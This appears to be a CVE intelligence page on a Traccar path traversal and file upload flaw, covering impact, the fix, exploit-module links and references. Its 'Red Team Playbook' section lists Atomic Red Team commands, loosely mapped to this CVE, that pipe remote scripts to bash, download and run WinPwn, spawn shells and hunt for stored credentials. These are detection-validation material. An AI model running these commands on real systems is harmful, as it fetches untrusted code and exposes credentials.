CVE-2024-24809
Overview
This vulnerability involves path traversal and unrestricted file upload flaws within the Traccar GPS tracking system prior to version 6.0. The root cause stems from insufficient validation of file upload paths and types, allowing files with a specific prefix to be stored in arbitrary directories. The affected component is the file upload functionality accessible to registered users by default.
Vulnerability Description
Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.
Impact
An attacker with a registered user account can upload files with controlled names and locations, enabling phishing, cross-site scripting, and potentially arbitrary command execution on the server. This requires network access and user registration but no elevated privileges beyond ordinary user rights. The vulnerability's CVSS vector indicates low attack complexity and privileges required (AV:N/AC:L/PR:L/UI:N), allowing impactful integrity and availability breaches within the system.
Solution
Upgrade Traccar to version 6.0 or later, as this release includes patches that enforce strict validation on file upload paths and restrict dangerous file types. Refer to the GitHub security advisory GHSA-vhrw-72f6-gwp5 and the patch commit b099b298f90074c825ba68ce73532933c7b9d901 for detailed remediation steps and verification guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source GPS tracking system Traccar stems from a combination of path traversal and unrestricted file upload capabilities. This flaw allows an attacker to manipulate file paths and upload malicious files, particularly those prefixed with "device." The core issue lies in the system's failure to properly validate user input and enforce strict file type restrictions. As a result, an attacker can exploit this weakness to place harmful files within the server's directory structure, potentially leading to significant security breaches.
Attack vectors for this vulnerability are relatively straightforward. An attacker can register as a regular user, which is permitted by default, and subsequently exploit the file upload functionality. By crafting a malicious file, such as a web shell or a script that can execute commands on the server, the attacker can gain unauthorized access to sensitive data or even take control of the server. Furthermore, this vulnerability can facilitate phishing attacks and cross-site scripting (XSS) exploits, as the uploaded files can be designed to deceive users or manipulate their sessions. The ease of exploitation, combined with the potential for severe consequences, makes this vulnerability particularly concerning for organizations using the affected software.
The real-world impact of this vulnerability can be profound, especially for businesses that rely on GPS tracking for logistics, fleet management, or personal safety applications. If an attacker successfully exploits this flaw, they could gain access to sensitive location data, user information, and potentially disrupt operations. The business risk extends beyond immediate financial losses; reputational damage, legal liabilities, and regulatory repercussions can follow a successful attack. Organizations may face significant operational downtime, loss of customer trust, and increased scrutiny from stakeholders and regulatory bodies.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the software to the latest version is crucial, as version 6.0 includes a patch that addresses this issue. Additionally, organizations should conduct thorough security assessments and penetration testing to identify and remediate any potential weaknesses in their systems. Employing web application firewalls (WAFs) can help filter out malicious requests and prevent unauthorized file uploads. Furthermore, implementing strict input validation and file type restrictions can significantly reduce the risk of exploitation. Continuous monitoring of user activities and file uploads can also aid in early detection of suspicious behavior, allowing for timely intervention.
In conclusion, the vulnerability in Traccar presents a significant threat to organizations utilizing the software for GPS tracking. The combination of path traversal and unrestricted file upload capabilities creates a pathway for attackers to exploit the system, leading to potential data breaches and operational disruptions. By understanding the technical details of this vulnerability, recognizing the various attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities. Proactive measures, including regular updates and security assessments, are essential in maintaining a secure environment and safeguarding sensitive information.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-24809, coinciding with the emergence of new proof-of-concept exploits publicly available on GitHub and integrated Metasploit modules. Our telemetry indicates that attackers are increasingly leveraging the vulnerability’s unrestricted file upload and path traversal capabilities to deploy malicious payloads, with some campaigns demonstrating attempts to establish persistent remote code execution via cronjob insertion. This shift from theoretical to active exploitation significantly elevates the operational risk, especially given the default root-level execution context in affected Traccar versions. Consequently, the threat landscape for this vulnerability has intensified, warranting heightened vigilance as adversaries refine their tactics to achieve system compromise and lateral movement. The EPSS score remains high, reflecting sustained exploitability, but the recent surge in detection activity underscores an urgent need for defenders to prioritize monitoring and incident response related to this vulnerability.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464)
exploits/linux/http/paloalto_expedition_rce
|
Michael Heinzl, Zach Hanley, Enrique Castillo +1 | Unknown | - | View |
|
Traccar v5 Remote Code Execution (CVE-2024-31214 and CVE-2024-24809)
exploits/linux/http/traccar_rce_upload
|
Michael Heinzl, yiliufeng168, Naveen Sunkavally | Unknown | linux | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
gh-ost00/CVE-2024-24809-Proof-of-concept
Critical Flaws in Traccar GPS System Expose Users to Remote Attacks
|
gh-ost00 | 5 | 0 | 2024-09-03 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-24809 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/traccar/traccar/security/advisories/GHSA-vhrw-72f6-gwp5 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/traccar/traccar/commit/b099b298f90074c825ba68ce73532933c7b9d901 |